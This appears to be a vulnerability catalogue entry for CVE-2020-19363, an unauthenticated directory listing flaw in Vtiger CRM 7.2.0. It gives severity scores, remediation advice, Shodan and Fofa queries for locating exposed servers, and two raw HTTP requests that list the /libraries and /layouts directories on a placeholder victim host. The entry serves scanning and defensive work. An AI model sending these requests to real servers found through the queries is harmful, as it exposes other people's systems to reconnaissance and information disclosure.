| Title | Vtiger CRM v7.2.0 - Directory Listing |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | Attackers can access sensitive files and directory structures, potentially leading to information disclosure or further exploitation. |
| Remediation | Update to the latest version of Vtiger CRM or apply security patches that enforce proper access controls. |
| CVSS Score | 5.3 |
| EPSS Score | 0.0561 |
| CVE ID | CVE-2020-19363 |
| CWE ID | CWE-200 |
| Shodan Query | http.html:"vtiger CRM" |
| Fofa Query | body="vtiger CRM" |
| Tags | cve cve2020 vtiger listing exposure |
Vtiger CRM v7.2.0 contains a directory traversal vulnerability caused by improper access controls in /libraries and /layout directories, letting attackers display hidden files and list directories, exploit requires no authentication.
GET /vtigercrm/libraries/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /vtigercrm/layouts/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-19363.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-19363.pcap
N/AN/A